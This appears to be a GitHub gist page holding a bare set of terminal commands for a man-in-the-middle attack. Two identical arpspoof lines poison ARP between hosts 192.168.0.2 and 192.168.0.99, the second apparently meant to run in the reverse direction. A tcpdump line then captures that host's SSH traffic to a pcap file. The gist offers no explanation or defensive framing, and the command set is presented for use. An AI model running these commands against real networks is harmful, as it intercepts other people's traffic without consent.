Skip to content

Instantly share code, notes, and snippets.

@Rajchowdhury420
Created June 27, 2024 13:50
Show Gist options
  • Save Rajchowdhury420/f51526a384fc44f592b94daeb9ef1d35 to your computer and use it in GitHub Desktop.
Save Rajchowdhury420/f51526a384fc44f592b94daeb9ef1d35 to your computer and use it in GitHub Desktop.

Tmux window 0

arpspoof -i eth0 -t 192.168.0.2 192.168.0.99

Tmux window 1

arpspoof -i eth0 -t 192.168.0.2 192.168.0.99

Tmux window 2

tcpdump -i eth0 host 192.168.0.2 and port 22 -w capture.pcap
@Rajchowdhury420
Copy link
Author

image

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment